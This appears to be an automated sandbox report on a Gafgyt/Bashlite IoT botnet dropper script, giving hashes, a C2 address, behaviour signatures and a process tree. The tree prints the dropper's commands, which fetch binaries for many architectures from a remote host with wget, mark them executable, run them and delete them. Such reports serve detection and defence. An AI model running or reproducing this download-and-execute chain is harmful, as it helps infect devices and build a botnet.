Analysis

  • max time kernel
    16s
  • max time network
    18s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240729-en
  • resource tags

    arch:mips
    image:debian9-mipsbe-20240729-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mips
    system
  • submitted
    14-12-2024 15:05

General

  • Target

    sex.sh

  • Size

    1KB

  • MD5

    255decb3180bb0e03b43d0d6246c3977

  • SHA1

    c99637830a502bc731837adff300980a592e8316

  • SHA256

    2d718fdd5a61973c8c4c9bd4e7f40e5e424dd39d446597efc4cb79889211f875

  • SHA512

    0389441154ebc943637cecbd434c38567baf4eb068bc68184906ec5f1c61eee928b0a1b73f5de65fa8d02fedd686169d64519be2c4c75d45824da982247ee3fd

Malware Config

Extracted

Family

gafgyt

C2

84.200.24.7:666

Signatures

  • Detected Gafgyt variant 12 IoCs
  • Gafgyt family
  • Gafgyt/Bashlite

    IoT botnet with numerous variants first seen in 2014.

  • File and Directory Permissions Modification 1 TTPs 13 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 12 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Changes its process name 1 IoCs
  • System Network Configuration Discovery 1 TTPs 6 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 12 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/sex.sh
    /tmp/sex.sh
    1⤵
      PID:719
      • /usr/bin/wget
        wget http://84.200.24.7/mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:721
      • /bin/chmod
        chmod +x mips
        2⤵
        • File and Directory Permissions Modification
        PID:736
      • /tmp/mips
        ./mips
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Changes its process name
        • System Network Configuration Discovery
        PID:738
      • /bin/rm
        rm -rf mips
        2⤵
        • System Network Configuration Discovery
        PID:741
      • /usr/bin/wget
        wget http://84.200.24.7/mipsel
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:744
      • /bin/chmod
        chmod +x mipsel
        2⤵
        • File and Directory Permissions Modification
        PID:753
      • /tmp/mipsel
        ./mipsel
        2⤵
        • Executes dropped EXE
        • System Network Configuration Discovery
        PID:754
      • /bin/rm
        rm -rf mipsel
        2⤵
        • System Network Configuration Discovery
        PID:756
      • /usr/bin/wget
        wget http://84.200.24.7/sh4
        2⤵
        • Writes file to tmp directory
        PID:757
      • /bin/chmod
        chmod +x sh4
        2⤵
        • File and Directory Permissions Modification
        PID:760
      • /tmp/sh4
        ./sh4
        2⤵
        • Executes dropped EXE
        PID:761
      • /bin/rm
        rm -rf sh4
        2⤵
        PID:764
      • /usr/bin/wget
        wget http://84.200.24.7/x86
        2⤵
        • Writes file to tmp directory
        PID:765
      • /bin/chmod
        chmod +x x86
        2⤵
        • File and Directory Permissions Modification
        PID:766
      • /tmp/x86
        ./x86
        2⤵
        • Executes dropped EXE
        PID:767
      • /bin/rm
        rm -rf x86
        2⤵
        PID:769
      • /usr/bin/wget
        wget http://84.200.24.7/arm61
        2⤵
        • Writes file to tmp directory
        PID:770
      • /bin/chmod
        chmod +x arm61
        2⤵
        • File and Directory Permissions Modification
        PID:771
      • /tmp/arm61
        ./arm61
        2⤵
        • Executes dropped EXE
        PID:772
      • /bin/rm
        rm -rf arm61
        2⤵
        PID:774
      • /usr/bin/wget
        wget http://84.200.24.7/i686
        2⤵
        • Writes file to tmp directory
        PID:775
      • /bin/chmod
        chmod +x i686
        2⤵
        • File and Directory Permissions Modification
        PID:776
      • /tmp/i686
        ./i686
        2⤵
        • Executes dropped EXE
        PID:777
      • /bin/rm
        rm -rf i686
        2⤵
        PID:779
      • /usr/bin/wget
        wget http://84.200.24.7/ppc
        2⤵
        • Writes file to tmp directory
        PID:780
      • /bin/chmod
        chmod +x ppc
        2⤵
        • File and Directory Permissions Modification
        PID:783
      • /tmp/ppc
        ./ppc
        2⤵
        • Executes dropped EXE
        PID:784
      • /bin/rm
        rm -rf ppc
        2⤵
        PID:787
      • /usr/bin/wget
        wget http://84.200.24.7/586
        2⤵
        • Writes file to tmp directory
        PID:789
      • /bin/chmod
        chmod +x 586
        2⤵
        • File and Directory Permissions Modification
        PID:796
      • /tmp/586
        ./586
        2⤵
        • Executes dropped EXE
        PID:797
      • /bin/rm
        rm -rf 586
        2⤵
        PID:800
      • /usr/bin/wget
        wget http://84.200.24.7/m68k
        2⤵
        • Writes file to tmp directory
        PID:802
      • /bin/chmod
        chmod +x m68k
        2⤵
        • File and Directory Permissions Modification
        PID:809
      • /tmp/m68k
        ./m68k
        2⤵
        • Executes dropped EXE
        PID:811
      • /bin/rm
        rm -rf m68k
        2⤵
        PID:814
      • /usr/bin/wget
        wget http://84.200.24.7/dc
        2⤵
        • Writes file to tmp directory
        PID:815
      • /bin/chmod
        chmod +x dc
        2⤵
        • File and Directory Permissions Modification
        PID:824
      • /tmp/dc
        ./dc
        2⤵
        • Executes dropped EXE
        PID:825
      • /bin/rm
        rm -rf dc
        2⤵
        PID:828
      • /usr/bin/wget
        wget http://84.200.24.7/dss
        2⤵
        • Writes file to tmp directory
        PID:830
      • /bin/chmod
        chmod +x dss
        2⤵
        • File and Directory Permissions Modification
        PID:841
      • /tmp/dss
        ./dss
        2⤵
        • Executes dropped EXE
        PID:843
      • /bin/rm
        rm -rf dss
        2⤵
        PID:846
      • /usr/bin/wget
        wget http://84.200.24.7/co
        2⤵
        • Writes file to tmp directory
        PID:848
      • /bin/chmod
        chmod +x co
        2⤵
        • File and Directory Permissions Modification
        PID:851
      • /tmp/co
        ./co
        2⤵
        • Executes dropped EXE
        PID:852
      • /bin/rm
        rm -rf co
        2⤵
        PID:854
      • /usr/bin/wget
        wget http://84.200.24.7/scar
        2⤵
        PID:855
      • /bin/chmod
        chmod +x scar
        2⤵
        • File and Directory Permissions Modification
        PID:856
      • /tmp/scar
        ./scar
        2⤵
        PID:857
      • /bin/rm
        rm -rf scar
        2⤵
        PID:858

Network

MITRE ATT&CK Enterprise v15


Downloads

  • /tmp/586

    Filesize

    94KB

    MD5

    8463bb2a52278fccd845a2446f8be854

    SHA1

    7369b66a49a6066030c37e8e1a0ec19ab878e2ec

    SHA256

    19e6eb7e3ca3f073200b950dbfa30644d9afcbf99c74c650c8a0016eb0aea420

    SHA512

    f92579021b6316079c55db56d94dc79b6f8dccd5eac1ca4b8451644b0df8297ed0a1203828bc25cc218da0badb89968fe5a7342d724044ff4ac4de8ff60ccfe7

  • /tmp/arm61

    Filesize

    136KB

    MD5

    8be4d39830172bb4eb47b989973d349d

    SHA1

    2e55fa4c873a9646535f856ee8f3fbf24de6279f

    SHA256

    00ffb68e788d3e5e910d2e1d4a036a11f4b34274d9d2b281b1a9882c03907799

    SHA512

    c38cf50e7c14b053e0cc9432920b6f3e576a7662b09dbbc1c16cbdff8a4b820122f1ebe3f5a969ba1e5c87e3c240183618b4e625a853aa13cd6c216b4e6fe016

  • /tmp/co

    Filesize

    117KB

    MD5

    49f06082c95ca854779ecada9a788849

    SHA1

    9394600a9f7212ddc175659dc272ae4759c738b3

    SHA256

    b1b260102dbf4bedc8045bf87820ca8304be082f17c34531f14c30c240ad08e1

    SHA512

    8ac1038399d5bf68dcbdc917148416da3d36aba2da9c1a4f298897b8411908ab7032a1e95ab205e129751164839febd78c43d97d6d5849cd98b35a79846a6da3

  • /tmp/dc

    Filesize

    123KB

    MD5

    1d28148f828971df08bca7f5b4fd0e0f

    SHA1

    91b1b9b7aa460dfa99ffa2ce7bde67a00c3f8237

    SHA256

    169154df3f7d61ab01e0fe96646800b2e18727adc5f0c9abddd57c1770a17afd

    SHA512

    3e7dbee01cfb5109fe2f55628257e6cc3962384ddce673912994ac7f3ab13db1d280ec341ddfa9ca3b81b2edcf90b3241f69a28b8b9dfe1941af466f906366a9

  • /tmp/dss

    Filesize

    124KB

    MD5

    4aaf4d4b417d7a5078a0e48f12653d81

    SHA1

    d2b6785e877fae5c0ad5978f9d510e8cfdf5e102

    SHA256

    e7026cb71392d47f04c12cb8c1591561e0d63b815142102bfea482dfd9635acb

    SHA512

    dfa7c6185820f6da4e3512ce8455becea881798460542dc2b67e2a5a59e528371942b30430c6a7b51439fee9ec6eb7676b1bc87a04484da28c553fe049c029b1

  • /tmp/i686

    Filesize

    96KB

    MD5

    41f1dfcf258eab8a0845e9accc3b0174

    SHA1

    216756fb1769ffb855e39f62b2c3cab63c66eaee

    SHA256

    b23ac5a469bbb1b8abb3c82fcd13d1dbbb27d82bb847b93a392e4efbeefcc48c

    SHA512

    4c4e9f1609c0faf6d76eb6a60cd86941fc69fe21c3634c851f923da9354a4f5967eb4b7875f8d16e2ca6e272beac280f8a4c1b64528765a515e5501906b503a1

  • /tmp/m68k

    Filesize

    111KB

    MD5

    c9d48ac85b3b184fd20b5bc3fb4872d3

    SHA1

    ec02edde62edeeade7fce1b6a5f0390e242a4723

    SHA256

    e8c1bbf011a3127022114e5a1a07fed193af7016aba66fe6ca378405db19b7de

    SHA512

    fe2fcea215ee984228db99de7c88b4f9476ada843528ac4cc076ff076a1354cd499b8b4429e2f54e455df8fa84568c817c982fd2f10ba7233b4ceda0d86eada7

  • /tmp/mips

    Filesize

    148KB

    MD5

    d6001ccc3698da0b114c8ecbf2f31bbc

    SHA1

    98403730633fd63e92b04c5f149a07668bd62012

    SHA256

    37cdc22e48013fc55d7e6d7e300a8fc1b8803d99b7cbd451bc16313982b51298

    SHA512

    096cbc89b0ba1d76a5524aa6ee98223c11dd3a2f2eb2a522b43ebce57004c67b656835d0b5bf6e8fc36956dae15684bfbf11cfb95c407415abf8e618ef8dd86d

  • /tmp/mipsel

    Filesize

    148KB

    MD5

    04680d0ce29c9e9c0b315df004e4e711

    SHA1

    acbdd21883d584685ae4cf5bade335c83a03d120

    SHA256

    e9d7c7273b9c1a1dc9885829f79bc8d44d2054ef074ebf8757e61c8e29c1c953

    SHA512

    05938331f8e14f842131e2ae0401ae32fb7fa1a3c8647f9a56c5b601867285d7b2cb1c84f2e361444af4fe1c74097e9bb5204fbaf91a1b0fa38d55823baf7bdd

  • /tmp/ppc

    Filesize

    110KB

    MD5

    8a9b060beade95395607241a1ba2748f

    SHA1

    4cfb9674e8ef3653d1b1f4be28d7d71076c2df18

    SHA256

    5468d7962128a23f13a0074cdc95b2e7d6e2a5bd31a19b85db2076fbf61a62b2

    SHA512

    879120d420e039b45bbae9cefd543ba92200a5c8f153464daea6efcbcccf46a95eac725c8b5ccfbc48b8581038858eb9dfc2eb62ad5575d3e6c4cb634990d73c

  • /tmp/sh4

    Filesize

    105KB

    MD5

    11f24d2812bd00bdb9119c5b5e77d70b

    SHA1

    0a983e68c941009b19c386d90d35d9642abfe713

    SHA256

    dadf9d1330b764611ba37e94bbca21b493084ef2dddbc7ee8acb0203d4719b88

    SHA512

    170f0ca6296b17ddb41705ae092b7b02c7da08c0525e45446b6ced1ac3557065ab0dd108c7064e4e13e30f30a523a74eeddafae7a3d94c0c0fc82fb70bc7e249

  • /tmp/x86

    Filesize

    112KB

    MD5

    b2a245611aaae902c4f5be372dc37327

    SHA1

    7accc90c3514bb07ff4c327b2b715b4f99a08cf9

    SHA256

    392d95c696d2fb3e5ee826c177215a91e5d31a59348fd582803fecff1ec315ad

    SHA512

    b8d65369c6bfae0534457c9b126f8496cc060da71c6d3cfb5877acf3512525a204720a4d169bcbab69d5c3c3e5558f271bcba619eef94603d08673a3ce1af4fe